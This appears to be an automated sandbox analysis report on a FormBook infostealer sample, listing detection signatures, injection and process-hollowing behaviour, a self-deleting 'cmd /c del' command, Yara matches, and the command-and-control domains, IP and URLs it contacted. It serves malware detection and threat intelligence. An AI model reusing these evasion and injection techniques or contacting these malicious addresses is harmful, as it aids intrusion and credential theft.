Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h] 2_2_04AD1B8F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h] 2_2_04AD1B8F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8138A mov eax, dword ptr fs:[00000030h] 2_2_04B8138A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7D380 mov ecx, dword ptr fs:[00000030h] 2_2_04B7D380
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2397 mov eax, dword ptr fs:[00000030h] 2_2_04AF2397
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD8794 mov eax, dword ptr fs:[00000030h] 2_2_04AD8794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFB390 mov eax, dword ptr fs:[00000030h] 2_2_04AFB390
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B037F5 mov eax, dword ptr fs:[00000030h] 2_2_04B037F5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEDBE9 mov eax, dword ptr fs:[00000030h] 2_2_04AEDBE9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h] 2_2_04B453CA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h] 2_2_04B453CA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h] 2_2_04AC4F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h] 2_2_04AC4F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFE730 mov eax, dword ptr fs:[00000030h] 2_2_04AFE730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h] 2_2_04AFA70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h] 2_2_04AFA70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8131B mov eax, dword ptr fs:[00000030h] 2_2_04B8131B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h] 2_2_04B5FF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h] 2_2_04B5FF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h] 2_2_04B9070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h] 2_2_04B9070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEF716 mov eax, dword ptr fs:[00000030h] 2_2_04AEF716
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACDB60 mov ecx, dword ptr fs:[00000030h] 2_2_04ACDB60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADFF60 mov eax, dword ptr fs:[00000030h] 2_2_04ADFF60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98F6A mov eax, dword ptr fs:[00000030h] 2_2_04B98F6A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h] 2_2_04AF3B7A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h] 2_2_04AF3B7A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98B58 mov eax, dword ptr fs:[00000030h] 2_2_04B98B58
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACDB40 mov eax, dword ptr fs:[00000030h] 2_2_04ACDB40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADEF40 mov eax, dword ptr fs:[00000030h] 2_2_04ADEF40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACF358 mov eax, dword ptr fs:[00000030h] 2_2_04ACF358
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\7pECKdsaig.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A8ACE0 LdrLoadDll, 0_2_00A8ACE0

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.controlplus.systems
Source: C:\Windows\explorer.exe Domain query: www.mogi.africa
Source: C:\Windows\explorer.exe Domain query: www.kellnovaglobalfood.info
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: B60000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\7pECKdsaig.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\7pECKdsaig.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3452 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe" Jump to behavior
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.000000000833A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830326 Sample: 7pECKdsaig.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 24 www.quickhealcareltd.co.uk 2->24 38 Snort IDS alert for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 6 other signatures 2->44 10 7pECKdsaig.exe 2->10         started        signatures3 process4 signatures5 46 Modifies the context of a thread in another process (thread injection) 10->46 48 Maps a DLL or memory area into another process 10->48 50 Sample uses process hollowing technique 10->50 52 2 other signatures 10->52 13 explorer.exe 5 6 10->13 injected process6 dnsIp7 26 www.mogi.africa 13->26 28 www.kellnovaglobalfood.info 13->28 30 3 other IPs or domains 13->30 54 System process connects to network (likely due to code injection or exploit) 13->54 17 msdt.exe 13->17         started        signatures8 process9 signatures10 32 Modifies the context of a thread in another process (thread injection) 17->32 34 Maps a DLL or memory area into another process 17->34 36 Tries to detect virtualization through RDTSC time measurements 17->36 20 cmd.exe 1 17->20         started        process11 process12 22 conhost.exe 20->22         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.102.136.180
 controlplus.systems United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
controlplus.systems 34.102.136.180 true
kellnovaglobalfood.info 34.102.136.180 true
www.quickhealcareltd.co.uk unknown unknown
www.mogi.africa unknown unknown
www.kellnovaglobalfood.info unknown unknown
www.controlplus.systems unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.kellnovaglobalfood.info/ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ false
  • Avira URL Cloud: malware
 unknown
http://www.controlplus.systems/ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ false
  • Avira URL Cloud: malware
 unknown
www.2348x.com/ar73/ true
  • Avira URL Cloud: malware
 low